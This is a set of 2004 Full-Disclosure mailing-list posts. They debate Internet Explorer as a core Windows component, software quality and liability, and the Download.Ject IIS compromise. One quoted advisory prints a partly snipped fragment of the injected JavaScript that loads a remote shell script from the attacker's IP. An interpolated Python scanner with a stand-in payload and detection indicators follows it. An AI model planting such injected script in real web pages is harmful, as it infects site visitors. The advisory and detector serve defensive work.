The odd spelling mistake on the Office or IIS marketing pages we may accept,
but getting something so badly wrong that anyone with two days experience of
real system administration would spot in an eye-blink _AND_ with such
potentially confusing results is pretty darn shoddy even by MS' own long
history of shoddy security standards...

Could it be worse?  Well, the page has not been posted long enough for
Google to have indexed it, yet...

I wonder when the first softie would have noticed this??

...

One final observation, ignoring that & has to be escaped in HTML markup
(encoded as an HTML entity in this case), this is actually the very smallest
of computer errors.  I said What a difference a char makes... in my
Subject: line, but this is really just a single bit error, as % is 0x25
and & 0x26.

Would it be too unkind to conclude that MS doesn't care one bit about
accuracy?


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854



RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread joe
In line with this email thread and if anyone is interested in playing with
an alternate shell... I went poking around and found what looks to be an
interesting GNU replacement shell. Note that they specifically point out
this isn't for novice users. 

You can find info at http://lsdocs.shellfront.org/ ,
http://www.lsdev.org/news.php , and http://www.litestep.net

It has build instructions available for VS6/7.1 and Dev-c++/MinGW.

 joe 





RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-06 Thread joe
 that you could
plug a different set of DLLs in as replacements so you could say use another
browsers functionality. But then people would complain because their
favorite browser couldn't be used because the people writing the browser
didn't want to produce the proper exports and blackbox guidelines in the
DLLs and go about blaming MS for that. On the nice side though, MS does
allow you methods in which to write your own stuff to get around it. Don't
like the MMC, write your own interface, I have written many. Don't like the
browser, write or download another. Don't like the shell write or download
another. 

This is probably a bit jumpy, I wrote this over the course of the whole day
and my mind was on about 1500 different things. I apologize if it is jumpy,
but I am not rewriting it irregardless of how jumpy it is. :o)


 joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Barry
Fitzgerald
Sent: Tuesday, July 06, 2004 10:28 AM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE Web Browser: Sitting Duck

joe wrote:

Couple of things.

1. The conversation you are referring to was a conversation about 
issues with core base components that necessitated a complete redesign. 
You kept bringing up items that were NOT core base components - they 
were UI components. IE being one of them. The very fact that you have a 
choice to use a different browser should help you understand that. Try 
to use a different ACL system on Windows NT based systems and tell me how
that goes.

  

The choice to use a different browser doesn't imply that IE isn't a core
base component at all.

Is it a part of the kernel?  No...

Is it completely unremovable?  Of course not...

Is it a part of the standard Windows UI?  Yes...

Is it impossible to remove easily and difficult to remove cleanly?  Yes...

Will removing it make many programs operate incorrectly?  Yes...

I think you see where I'm going with this.  It's a core component in MS
Windows, though it may not be a part of the OS kernel, it is, nonetheless,
undebatably, a core component of MS Windows as a software.  
Keep in mind, IE is more than just a simple executable.  The DLLs that it
uses are built to be used  by other portions of the system and are
extensively used.  Of course, this is the nature of DLLs.

   -Barry



RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-04 Thread joe
The fun thing with you is that irregardless of what I say, it isn't, in your
esteemed opinion, correct. 

Why? Because you once took to understand something I said as defending
Microsoft which is against your very narrow viewpoint so automatically I
can't possibly have any valid viewpoint. 

So, for instance, when I say outright, that the fact IE was sold to a bunch
of legal people (see my previous comments on legal type people) as core by
MS completely incorrectly in the viewpoint of looking at the OS components
technically you still choose to try to harass. Note I say try. Had that
same thing been said by someone posting with some open source email client
on *nix you would have been applauding assuming you understand 822.

As I mailed to you offlist, any time you are willing to discuss things
intelligently, email me. Posts such as the one below simply hurt your cause,
whatever in the world that might be. 

Being Bill Gates would be kind of cool. In those shoes I would sell off
every piece of MS I owned that the government would allow and go buy Tahiti
or Aruba or both and not touch a computer again. Again, remember, computers
aren't about religion, it is a means to an end. Work to live, don't live to
work. 

BTW, it is joe, not JOE - I am case sensitive and you hurt my feelings.  


   joe


 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
[EMAIL PROTECTED]
Sent: Saturday, July 03, 2004 4:45 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE Web Browser: Sitting Duck 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ha ha ha ha ha the dog bites his master he he he he

Couple of things

Judge: What is this Internet Explorer thing, Gates?
Bill Gates: It's a core component of the operating system, ma'am.
Judge: BULLSHIT GATES! JOE SAYS IT ISN'T

Judge: YOU'RE GUILTY!
Bill Gates: oh
JUDGE: 6 POSSIBLE SENTENCES: JAIL, FINE, FIX, REPENT, SUSPEND, GO TO JOE
SCHOOL OF REHABILITATION
joe: you see, you see, the judge has given him six options, that means he's
not guilty, do you see what I mean. Can you see it, can you see it.

By the way, did I tell you about my last gig? I made a whack of dough off it
and now I am sitting on the beach in Tahiti sucking back margaritas.

*sigh* I wish I were Bill Gates, he'd be so cool

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDnGt4ACgkQ9hJzGKhH2LeB8QCfannTbF14n/e2+gsGCHrr8bslFRAA
oLNZTgVQWsDJqDtjYdzDoHvDRy89
=HDOv
-----END PGP SIGNATURE-----






RE: [Full-Disclosure] Web sites compromised by IIS attack

2004-07-03 Thread joe
Heck I wouldn't mind seeing that in just electrical, natural/propane gas,
and water services. Delivery of those products is considered a service.
Getting that in software is a pipe dream if you can't get it in core
services aka utilities such as the ones listed which are considered
critical.  

I also happen to disagree with your conclusion. I think you would find that
the software service providers would be more focused on setting up rules
under which they will offer you an SLA in terms of what hardware, what
software, who modifies the machine. I have been in the computer support
industry in various ways for quite a while and almost always working with
SLAs. Quality isn't the big thing you see in SLAs, it is holes to get out of
having to perform to the SLA level. Dragging lawyers into the software arena
is not going to help anything. You want to drag lawyers somewhere, consider
some place wet and deep. The legal world is not, in my opinion, making this
a better world to live in. Just more lawsuit prone. 

  joe



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gilbert Pilz
Sent: Thursday, July 01, 2004 9:52 PM
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Web sites compromised by IIS attack


> With a software as a service model
> *combined* *with* measurable and verifiable service level agreements (where
> breaching the agreement results in refunds or other financial penalties) I
> think you would find that the service providers would be much more focused
> on quality and security because they have a direct financial interest in
> making sure the service remains up and operating correctly.



RE: [Full-Disclosure] Name One Web Site Compromised by Download.Ject?

2004-07-03 Thread joe
, look around. 


  joe


 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gregory A.
Gilliss
Sent: Wednesday, June 30, 2004 3:31 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Name One Web Site Compromised by
Download.Ject?

Oh the naivete ...

Regardless of the fact that this is full disclosure, does anyone really
think that any medium to large business concern wants to make public the
fact that their IT infrastructure is vulnerable? Especially in the Fascist
Utopia that we call America? Pu-LEEZ!

The reason that you have not seen anything is because no one wants to admit
that (a) they are vulnerable, (b) their equipment sucks, (c) they employ
idiots, (d) seventeen year old hackers are more intelligent/ diligent/
persistent than their US$100,000+ per year IT guru (who's currently in a
meeting...please leave a detailed message).

As a normal part of any security audit that I perform, I provide the client
with a contract that explicitly states that I will not, under penalty of
law, divulge the identity of the client to anyone (except maybe the DoJ if
they come after me). Companies (infallible as they are) have no desire to
publicize their shortcomings. The lack of news regarding victims of this
huge gaping hole (HGH) is no conspiracy or coverup. It's called standard
operating procedure. If you ever get a job in a corporation, you will
become familiar with it. 
Academicians aren't supposed to practice information hiding. However, I
wonder whether your search would uncover any academic institutions that have
suffered a similar fate?

BTW, I don't necessarily advocate the silence; I merely understand it.

G


RE: [Full-Disclosure] Web sites compromised by IIS attack

2004-07-01 Thread joe
> List me 5 other products where is it assumed and
> accepted that the purchased products has flaws.

I'll let you list them. List five products that regularly have an add-on
sale of extended warranties. If you don't feel there would be a failure, you
wouldn't buy an extended warranty. A long time ago in a galaxy far far away
I used to sell electronics, computers, white goods, cars, etc. Extended
warranties are pretty commonplace to buy. If customers felt there were no
flaws, they wouldn't be buying them. 


If you actually got your wish on the manufacturer having to touch the product
physically, I think you would see many things... I don't think you want any
of them. 

1. Warranty lifetime would reduce to 1 year or less, probably 90 days, that
is a pretty common electronics type warranty. Seven day exchange with
receipt. 

2. You would have very specific hardware guidelines on what could be
installed on the machine in order for you to run the OS or program. That
hardware would have to be installed at the factory dealer.

3. You would BRING the product into where you purchased it or to a local
service center and LEAVE IT; if that service center were not near you, you
would ship the product properly to that service center. Don't think of this
just for your OS, what about every program on the computer. If you installed
10-15-30 things, you could spend a lot of time at UPS. 

4. You would lose all control of updates and such that were applied once you
brought it in or mailed it in. If the SP from the OS broke 14 of your other
apps because they weren't properly using the OS (say taking advantage of a
security hole) you now have 14 other apps to go get straightened out... UPS
frequent shipper here you come...

5. Costs would go up substantially. Support is one of the most expensive
pieces of any company that deals with the public.

6. You may not be allowed to install additional software without voiding
your warranty. In fact, yet again, off you go to the factory dealer to get
ANY software installed at all. 

7. You would probably put out of business hundreds if not thousands of
software companies that couldn't handle this support model including tons of
open source companies that you personally like. 

8. New products would come out much slower and advances in the art would go
much slower as companies would be afraid of the costs of putting something
out that wasn't pretty darn perfect. Note that perfect is impossible so it
could be 8-10-12 years before you see that new version of the game you like.
Additionally, the art would be artificially slowed down just so you were
always running on known good hardware and software. Look at how many banks
and financial institutions still run OS/2 software on old IBM OPT series
computers. Why? Because it is a known good for their application. 



> That burden of fixing the flawed product is now on the consumer, not the
> producer.

This statement is blatantly incorrect. Are you recoding the broken pieces?
Nope. You are installing the fix. Just like if your Gateway PC blew a
hard drive, you would be installing the new hard drive Gateway shipped you. Be
happy Gateway allows you to do that; they could say you have to ship it to
them. 



There is no such thing as perfect software. There is no such thing as
perfect anything. Everything has some sort of flaws. Whether any given flaw
impacts you or not is another story. Anything made in any volume has a given
percentage that is expected to be bad. This is why you can expect to
occasionally have bugs in your food and issues in your electronics and bugs
in your software. It is a fact of life. The more you are willing to pay,
generally the better quality you will get. Look at NASA, go find out how
much they paid for the OS and system boards for the Mars rovers. How long
did they expect them to last? Contrast that with what you spent and the
useful life you are expecting. You want to look at cars, look at the
Rolls-Royce, the Bentley, the Aston. What do they cost in relation to your
Chevy or Ford or Honda? You very rarely hear about Rolls-Royce recalls...
They must be perfect, especially with how much you pay... Ummm nope.



  joe




-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Frank Knobbe
Sent: Thursday, July 01, 2004 11:24 AM
To: Denis Dimick
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Web sites compromised by IIS attack


Various snippages to chop this down...


> List me 5 other products where is it assumed and accepted that the purchased
> products has flaws.

> That burden of fixing the flawed product is now on the consumer, not the
> producer. That's what's wrong. The producer should fix the problem, not you.





RE: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread joe
For the IIS side

http://www.microsoft.com/security/incident/download_ject.mspx
 


Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.

Important: Customers who have deployed Windows XP Service Pack 2 RC2 are not
at risk.

Reports indicate that Web servers running Windows 2000 Server and IIS that
have not applied update 835732, which was addressed by Microsoft Security
Bulletin MS04-011, are possibly being compromised and being used to attempt
to infect users of Internet Explorer with malicious code.






-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
clients

Hi all,

This is a heads up.

A new malware has been reported from several sources so it appears to be
fairly widespread already.

The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers were compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).

The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a JavaScript that apparently gets appended to several files in
the webfolder of IIS (e.g. .html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html, which contains the following code:

<script language=Javascript>

function InjectedDuringRedirection(){
  showModalDialog('md.htm', window, dialog
Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width
:1\;).location=  java script:'SCRIPT  SRC =\\' http://
217.107.218.147/shellxxx.js\\' \ /script';

[snip - you get the picture, right?]

I had to put in some spaces to get past trivial content filtering.

From that point it will try to run the malware in a 1x1 dialogbox in the
following order:

shellscript_loadxxx.js
shellxxx.js

The shellxxx.js will try to drop msits.exe (51,712 bytes), a
trojan-downloader, and run it.

Consider denying access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.

Further information can be found in the daily log from SANS:
http://isc.sans.org/

Regards
Peter Kruse
http://www.csis.dk

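The appended-script behaviour Peter Kruse describes above, as an added detection example that is not code from the post, from CSIS or from Microsoft: the script below walks a copy of an IIS web root and flags files whose trailing bytes carry the 217.107.218.147 host, the InjectedDuringRedirection function name, or a showModalDialog block that pulls in a remote SRC=. The tail window, the extension list and the sample files are this example's own assumptions; the constructed INJECTED_TAIL is a placeholder carrying the same markers, not the real payload.

```python
import os
import re
import tempfile

# Indicators taken from the post: the host the injected script loads from
# and the function name in the appended block. Everything else here (the
# tail window, the extension list, the modal-dialog heuristic) is this
# example's own assumption, not something the post states.
IOC_HOST = b"217.107.218.147"
IOC_FUNC = b"InjectedDuringRedirection"
TAIL_BYTES = 4096   # assumption: appended code sits in the last few KB
EXTENSIONS = {".htm", ".html", ".asp", ".js", ".txt", ".gif"}

# One <script>...</script> block, case-insensitive, spanning newlines.
SCRIPT_RE = re.compile(rb"<\s*script\b.*?<\s*/\s*script\s*>", re.I | re.S)


def classify(data: bytes) -> list[str]:
    """Return the indicator names found in the tail of one file's contents."""
    tail = data[-TAIL_BYTES:]
    hits = []
    if IOC_HOST in tail:
        hits.append("c2-host")
    if IOC_FUNC in tail:
        hits.append("injected-function")
    for m in SCRIPT_RE.finditer(tail):
        block = m.group(0).upper()
        # showModalDialog plus a remote SRC= is the shape of the block in the post
        if b"SHOWMODALDIALOG" in block and b"SRC=" in block:
            hits.append("modal-remote-script")
            break
    return hits


def script_in_image(path: str, data: bytes) -> bool:
    """A <script> tag inside a .gif is wrong regardless of what it references."""
    return path.lower().endswith(".gif") and SCRIPT_RE.search(data[-TAIL_BYTES:]) is not None


def scan_webroot(root: str) -> dict[str, list[str]]:
    """Walk root and map relative path -> sorted indicator list for flagged files."""
    findings = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() not in EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            hits = classify(data)
            if script_in_image(path, data):
                hits.append("script-in-image")
            if hits:
                findings[os.path.relpath(path, root)] = sorted(set(hits))
    return findings


# Constructed stand-in for the appended block described in the post. It keeps
# the host, the function name and the showModalDialog/SRC= shape but is not
# the real payload and does nothing useful if rendered.
INJECTED_TAIL = (
    b"<script language=Javascript>\n"
    b"function InjectedDuringRedirection(){\n"
    b"  showModalDialog('md.htm', window, 'dialogHeight:1;dialogWidth:1;')"
    b".location = 'javascript:SCRIPT SRC=http://217.107.218.147/shellxxx.js';\n"
    b"}\n</script>\n"
)


def build_demo_root() -> str:
    """Create a temporary web root with constructed clean and tampered files."""
    root = tempfile.mkdtemp(prefix="iisroot-")
    clean_html = b"<html><body><h1>Welcome</h1></body></html>\n"
    gif = b"GIF89a" + b"\x00" * 64
    samples = {
        "index.html": clean_html + INJECTED_TAIL,   # tampered page
        "about.html": clean_html,                    # clean page
        "readme.txt": b"release notes\n" + INJECTED_TAIL,
        "logo.gif": gif + INJECTED_TAIL,             # script appended to an image
        "clean.gif": gif,
        "notes.doc": INJECTED_TAIL,                  # out-of-scope extension, ignored
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_webroot(build_demo_root()).items()):
        print(f"{rel}: {', '.join(hits)}")
```

Point scan_webroot at a copy of the web folder taken off the box (Python 3.9 or later). The scanner only reports what it finds; it does not clean the files, and a server that was writable enough to get this appended needs the MS04-011 update and a rebuild decision, not just a cleanup.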

Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

2004-06-24 Thread joe smith
Kaspersky detects it as Backdoor.Agobot.gen.  So, another one of the many 
other Agobot variants.

Michael Young wrote:
> Yesterday a large client of ours was taken down by what appears to be 
> a Korgo variant, but I have been unable to locate any information on 
> this worm.  From what we have discovered, the main process is 
> VDisp.exe.  It is spreading through unpatched systems vulnerable to 
> the LSASS exploit, and propagates itself through a series of randomly 
> chosen ports.  The worm creates randomly generated services that 
> initialize the process, and also creates a registry entry in 
> RunServices and Run to load.  I am anxious to hear any feedback anyone 
> has regarding this issue as we are still attempting to reduce network 
> traffic and alleviate any remaining issues.  I have attached a copy of 
> the executable (rename to .exe).

 

Thank you,
 

Michael Young
IT Consultant
Miles Technologies
(800)-496-8001